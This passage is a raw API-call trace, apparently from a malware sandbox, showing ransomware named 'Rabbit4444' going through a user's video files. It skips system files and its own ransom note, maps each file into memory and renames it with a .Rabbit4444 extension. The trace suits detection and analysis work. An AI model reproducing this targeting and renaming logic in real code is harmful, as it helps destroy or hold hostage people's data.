CloseHandle (hObject=0x278) returned 1 [0048.481] CloseHandle (hObject=0x27c) returned 1 [0048.482] GetCurrentThreadId () returned 0xd98 [0048.482] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf64b0 [0048.482] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS") returned="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS" [0048.482] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10b100 | out: hHeap=0xe0000) returned 1 [0048.482] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf64a8 | out: hHeap=0xe0000) returned 1 [0048.482] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS") returned="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS" [0048.482] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\") returned="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\" [0048.482] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\.BFC0E91B00AE8A0620D3" [0048.482] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\videos\\ahcaygdd_us\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0048.483] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0048.485] FlushFileBuffers (hFile=0x27c) returned 1 [0048.486] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0048.487] CloseHandle (hObject=0x27c) returned 1 [0048.489] lstrlenW (lpString="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS") returned 34 [0048.489] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0048.489] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8ff8cee0, ftCreationTime.dwHighDateTime=0x1d4d4f9, ftLastAccessTime.dwLowDateTime=0xa80b1890, ftLastAccessTime.dwHighDateTime=0x1d4cd0f, ftLastWriteTime.dwLowDateTime=0xe639c149, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0048.489] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.489] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.489] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0048.489] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0048.489] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8ff8cee0, ftCreationTime.dwHighDateTime=0x1d4d4f9, ftLastAccessTime.dwLowDateTime=0xa80b1890, ftLastAccessTime.dwHighDateTime=0x1d4cd0f, ftLastWriteTime.dwLowDateTime=0xe639c149, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.489] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.489] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.489] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0048.489] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0048.489] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0048.489] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe6375ea9, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe6375ea9, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe639c149, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0048.489] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.489] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0048.489] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8fae200, ftCreationTime.dwHighDateTime=0x1d4d324, ftLastAccessTime.dwLowDateTime=0x6a28bc00, ftLastAccessTime.dwHighDateTime=0x1d4cb00, ftLastWriteTime.dwLowDateTime=0x6a28bc00, ftLastWriteTime.dwHighDateTime=0x1d4cb00, nFileSizeHigh=0x0, nFileSizeLow=0xac0a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2SeeX7efa.avi", cAlternateFileName="2SEEX7~1.AVI")) returned 1 [0048.489] lstrcmpiW (lpString1="2SeeX7efa.avi", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.489] lstrcmpiW (lpString1="2SeeX7efa.avi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.489] lstrcmpiW (lpString1="2SeeX7efa.avi", lpString2="Rabbit4444.exe") returned -1 [0048.489] lstrcmpiW (lpString1="2SeeX7efa.avi", lpString2=".") returned 1 [0048.489] lstrcmpiW (lpString1="2SeeX7efa.avi", lpString2="..") returned 1 [0048.489] lstrcmpiW (lpString1="2SeeX7efa.avi", lpString2="windows") returned -1 [0048.489] lstrcmpiW (lpString1="2SeeX7efa.avi", lpString2="bootmgr") returned -1 [0048.489] lstrcmpiW (lpString1="2SeeX7efa.avi", lpString2="pagefile.sys") returned -1 [0048.489] lstrcmpiW (lpString1="2SeeX7efa.avi", lpString2="boot") returned -1 [0048.489] lstrcmpiW (lpString1="2SeeX7efa.avi", lpString2="ids.txt") returned -1 [0048.489] lstrcmpiW (lpString1="2SeeX7efa.avi", lpString2="NTUSER.DAT") returned -1 [0048.490] lstrcpyW (in: lpString1=0x130eb7e, lpString2="2SeeX7efa.avi" | out: lpString1="2SeeX7efa.avi") returned="2SeeX7efa.avi" [0048.490] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\2SeeX7efa.avi", dwFileAttributes=0x0) returned 1 [0048.490] lstrlenW (lpString="2SeeX7efa.avi") returned 13 [0048.490] lstrlenW (lpString="Rabbit4444") returned 10 [0048.490] lstrcmpiW (lpString1="eX7efa.avi", lpString2="Rabbit4444") returned -1 [0048.490] lstrlenW (lpString=".dll") returned 4 [0048.490] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0048.490] lstrlenW (lpString=".lnk") returned 4 [0048.490] lstrcmpiW (lpString1=".avi", lpString2=".lnk") returned -1 [0048.490] lstrlenW (lpString=".ini") returned 4 [0048.490] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0048.490] lstrlenW (lpString=".sys") returned 4 [0048.490] lstrcmpiW (lpString1=".avi", lpString2=".sys") returned -1 [0048.490] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\2SeeX7efa.avi" (normalized: "c:\\users\\fd1hvy\\videos\\ahcaygdd_us\\2seex7efa.avi"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.490] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.490] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13980099314) returned 1 [0048.490] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=44042) returned 1 [0048.490] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0048.490] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0048.490] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xaf10, lpName=0x0) returned 0x298 [0048.491] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaf10) returned 0x70000 [0048.492] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.492] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0048.492] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.492] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0048.492] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.492] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0048.492] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.492] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0048.492] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13980293240) returned 1 [0048.492] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0048.492] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0048.492] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.493] CloseHandle (hObject=0x298) returned 1 [0048.493] CloseHandle (hObject=0x278) returned 1 [0048.495] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\2SeeX7efa.avi.Rabbit4444") returned 59 [0048.495] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\2SeeX7efa.avi" (normalized: "c:\\users\\fd1hvy\\videos\\ahcaygdd_us\\2seex7efa.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\2SeeX7efa.avi.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\videos\\ahcaygdd_us\\2seex7efa.avi.rabbit4444"), dwFlags=0x1) returned 1 [0048.495] InterlockedExchangeAdd (in: Addend=0xff618, Value=44048 | out: Addend=0xff618) returned 16756688 [0048.495] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3354 [0048.495] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf11a810, ftCreationTime.dwHighDateTime=0x1d4c5f6, ftLastAccessTime.dwLowDateTime=0x2bc5f9f0, ftLastAccessTime.dwHighDateTime=0x1d4d528, ftLastWriteTime.dwLowDateTime=0x2bc5f9f0, ftLastWriteTime.dwHighDateTime=0x1d4d528, nFileSizeHigh=0x0, nFileSizeLow=0x14efd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dIBFcA.flv", cAlternateFileName="")) returned 1 [0048.495] lstrcmpiW (lpString1="dIBFcA.flv", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.496] lstrcmpiW (lpString1="dIBFcA.flv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.496] lstrcmpiW (lpString1="dIBFcA.flv", lpString2="Rabbit4444.exe") returned -1 [0048.496] lstrcmpiW (lpString1="dIBFcA.flv", lpString2=".") returned 1 [0048.496] lstrcmpiW (lpString1="dIBFcA.flv", lpString2="..") returned 1 [0048.496] lstrcmpiW (lpString1="dIBFcA.flv", lpString2="windows") returned -1 [0048.496] lstrcmpiW (lpString1="dIBFcA.flv", lpString2="bootmgr") returned 1 [0048.496] lstrcmpiW (lpString1="dIBFcA.flv", lpString2="pagefile.sys") returned -1 [0048.496] lstrcmpiW (lpString1="dIBFcA.flv", lpString2="boot") returned 1 [0048.496] lstrcmpiW (lpString1="dIBFcA.flv", lpString2="ids.txt") returned -1 [0048.496] lstrcmpiW (lpString1="dIBFcA.flv", lpString2="NTUSER.DAT") returned -1 [0048.496] lstrcpyW (in: lpString1=0x130eb7e, lpString2="dIBFcA.flv" | out: lpString1="dIBFcA.flv") returned="dIBFcA.flv" [0048.496] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\dIBFcA.flv", dwFileAttributes=0x0) returned 1 [0048.496] lstrlenW (lpString="dIBFcA.flv") returned 10 [0048.496] lstrlenW (lpString="Rabbit4444") returned 10 [0048.496] lstrcmpiW (lpString1="dIBFcA.flv", lpString2="Rabbit4444") returned -1 [0048.496] lstrlenW (lpString=".dll") returned 4 [0048.496] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0048.496] lstrlenW (lpString=".lnk") returned 4 [0048.496] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0048.496] lstrlenW (lpString=".ini") returned 4 [0048.496] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0048.496] lstrlenW (lpString=".sys") returned 4 [0048.496] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0048.496] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\dIBFcA.flv" (normalized: "c:\\users\\fd1hvy\\videos\\ahcaygdd_us\\dibfca.flv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.496] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.496] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13980725003) returned 1 [0048.497] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=85757) returned 1 [0048.497] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0048.497] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0048.497] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x15200, lpName=0x0) returned 0x298 [0048.497] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15200) returned 0x70000 [0048.500] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.500] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0048.500] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.500] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0048.500] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.500] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0048.500] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.500] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0048.500] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13981088232) returned 1 [0048.500] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0048.500] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0048.500] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.501] CloseHandle (hObject=0x298) returned 1 [0048.501] CloseHandle (hObject=0x278) returned 1 [0048.504] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\dIBFcA.flv.Rabbit4444") returned 56 [0048.504] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\dIBFcA.flv" (normalized: "c:\\users\\fd1hvy\\videos\\ahcaygdd_us\\dibfca.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\dIBFcA.flv.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\videos\\ahcaygdd_us\\dibfca.flv.rabbit4444"), dwFlags=0x1) returned 1 [0048.504] InterlockedExchangeAdd (in: Addend=0xff618, Value=85760 | out: Addend=0xff618) returned 16800736 [0048.504] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 3355 [0048.504] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x905ca710, ftCreationTime.dwHighDateTime=0x1d4c943, ftLastAccessTime.dwLowDateTime=0x7f7f0230, ftLastAccessTime.dwHighDateTime=0x1d4c6b4, ftLastWriteTime.dwLowDateTime=0x7f7f0230, ftLastWriteTime.dwHighDateTime=0x1d4c6b4, nFileSizeHigh=0x0, nFileSizeLow=0x187de, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Hs7jFAf-QpkayKL1.mp4", cAlternateFileName="HS7JFA~1.MP4")) returned 1 [0048.504] lstrcmpiW (lpString1="Hs7jFAf-QpkayKL1.mp4", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.504] lstrcmpiW (lpString1="Hs7jFAf-QpkayKL1.mp4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.504] lstrcmpiW (lpString1="Hs7jFAf-QpkayKL1.mp4", lpString2="Rabbit4444.exe") returned -1 [0048.504] lstrcmpiW (lpString1="Hs7jFAf-QpkayKL1.mp4", lpString2=".") returned 1 [0048.504] lstrcmpiW (lpString1="Hs7jFAf-QpkayKL1.mp4", lpString2="..") returned 1 [0048.504] lstrcmpiW (lpString1="Hs7jFAf-QpkayKL1.mp4", lpString2="windows") returned -1 [0048.504] lstrcmpiW (lpString1="Hs7jFAf-QpkayKL1.mp4", lpString2="bootmgr") returned 1 [0048.504] lstrcmpiW (lpString1="Hs7jFAf-QpkayKL1.mp4", lpString2="pagefile.sys") returned -1 [0048.504] lstrcmpiW (lpString1="Hs7jFAf-QpkayKL1.mp4", lpString2="boot") returned 1 [0048.504] lstrcmpiW (lpString1="Hs7jFAf-QpkayKL1.mp4", lpString2="ids.txt") returned -1 [0048.505] lstrcmpiW (lpString1="Hs7jFAf-QpkayKL1.mp4", lpString2="NTUSER.DAT") returned -1 [0048.505] lstrcpyW (in: lpString1=0x130eb7e, lpString2="Hs7jFAf-QpkayKL1.mp4" | out: lpString1="Hs7jFAf-QpkayKL1.mp4") returned="Hs7jFAf-QpkayKL1.mp4" [0048.505] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\Hs7jFAf-QpkayKL1.mp4", dwFileAttributes=0x0) returned 1 [0048.505] lstrlenW (lpString="Hs7jFAf-QpkayKL1.mp4") returned 20 [0048.505] lstrlenW (lpString="Rabbit4444") returned 10 [0048.505] lstrcmpiW (lpString1="kayKL1.mp4", lpString2="Rabbit4444") returned -1 [0048.505] lstrlenW (lpString=".dll") returned 4 [0048.505] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0048.505] lstrlenW (lpString=".lnk") returned 4 [0048.505] lstrcmpiW (lpString1=".mp4", lpString2=".lnk") returned 1 [0048.505] lstrlenW (lpString=".ini") returned 4 [0048.505] lstrcmpiW (lpString1=".mp4", lpString2=".ini") returned 1 [0048.505] lstrlenW (lpString=".sys") returned 4 [0048.505] lstrcmpiW (lpString1=".mp4", lpString2=".sys") returned -1 [0048.505] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\Hs7jFAf-QpkayKL1.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\ahcaygdd_us\\hs7jfaf-qpkaykl1.mp4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.505] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.505] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13981598470) returned 1 [0048.505] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=100318) returned 1 [0048.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0048.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0048.505] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18ae0, lpName=0x0) returned 0x298 [0048.506] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18ae0) returned 0x70000 [0048.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0048.508] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0048.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.508] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0048.508] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.508] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0048.508] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13981902813) returned 1 [0048.508] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0048.508] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0048.508] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.509] CloseHandle (hObject=0x298) returned 1 [0048.509] CloseHandle (hObject=0x278) returned 1 [0048.512] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\Hs7jFAf-QpkayKL1.mp4.Rabbit4444") returned 66 [0048.512] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\Hs7jFAf-QpkayKL1.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\ahcaygdd_us\\hs7jfaf-qpkaykl1.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\Hs7jFAf-QpkayKL1.mp4.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\videos\\ahcaygdd_us\\hs7jfaf-qpkaykl1.mp4.rabbit4444"), dwFlags=0x1) returned 1 [0048.513] InterlockedExchangeAdd (in: Addend=0xff618, Value=100320 | out: Addend=0xff618) returned 16886496 [0048.513] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 3358 [0048.513] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50902e0, ftCreationTime.dwHighDateTime=0x1d4d32e, ftLastAccessTime.dwLowDateTime=0xe4a937b0, ftLastAccessTime.dwHighDateTime=0x1d4cf52, ftLastWriteTime.dwLowDateTime=0xe4a937b0, ftLastWriteTime.dwHighDateTime=0x1d4cf52, nFileSizeHigh=0x0, nFileSizeLow=0x3369, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qIBn Mru7Ws.mkv", cAlternateFileName="QIBNMR~1.MKV")) returned 1 [0048.513] lstrcmpiW (lpString1="qIBn Mru7Ws.mkv", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.513] lstrcmpiW (lpString1="qIBn Mru7Ws.mkv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.513] lstrcmpiW (lpString1="qIBn Mru7Ws.mkv", lpString2="Rabbit4444.exe") returned -1 [0048.513] lstrcmpiW (lpString1="qIBn Mru7Ws.mkv", lpString2=".") returned 1 [0048.513] lstrcmpiW (lpString1="qIBn Mru7Ws.mkv", lpString2="..") returned 1 [0048.513] lstrcmpiW (lpString1="qIBn Mru7Ws.mkv", lpString2="windows") returned -1 [0048.513] lstrcmpiW (lpString1="qIBn Mru7Ws.mkv", lpString2="bootmgr") returned 1 [0048.513] lstrcmpiW (lpString1="qIBn Mru7Ws.mkv", lpString2="pagefile.sys") returned 1 [0048.513] lstrcmpiW (lpString1="qIBn Mru7Ws.mkv", lpString2="boot") returned 1 [0048.513] lstrcmpiW (lpString1="qIBn Mru7Ws.mkv", lpString2="ids.txt") returned 1 [0048.513] lstrcmpiW (lpString1="qIBn Mru7Ws.mkv", lpString2="NTUSER.DAT") returned 1 [0048.513] lstrcpyW (in: lpString1=0x130eb7e, lpString2="qIBn Mru7Ws.mkv" | out: lpString1="qIBn Mru7Ws.mkv") returned="qIBn Mru7Ws.mkv" [0048.513] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\qIBn Mru7Ws.mkv", dwFileAttributes=0x0) returned 1 [0048.514] lstrlenW (lpString="qIBn Mru7Ws.mkv") returned 15 [0048.514] lstrlenW (lpString="Rabbit4444") returned 10 [0048.514] lstrcmpiW (lpString1="Mru7Ws.mkv", lpString2="Rabbit4444") returned -1 [0048.514] lstrlenW (lpString=".dll") returned 4 [0048.514] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0048.514] lstrlenW (lpString=".lnk") returned 4 [0048.514] lstrcmpiW (lpString1=".mkv", lpString2=".lnk") returned 1 [0048.514] lstrlenW (lpString=".ini") returned 4 [0048.514] lstrcmpiW (lpString1=".mkv", lpString2=".ini") returned 1 [0048.514] lstrlenW (lpString=".sys") returned 4 [0048.514] lstrcmpiW (lpString1=".mkv", lpString2=".sys") returned -1 [0048.514] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\qIBn Mru7Ws.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\ahcaygdd_us\\qibn mru7ws.mkv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, 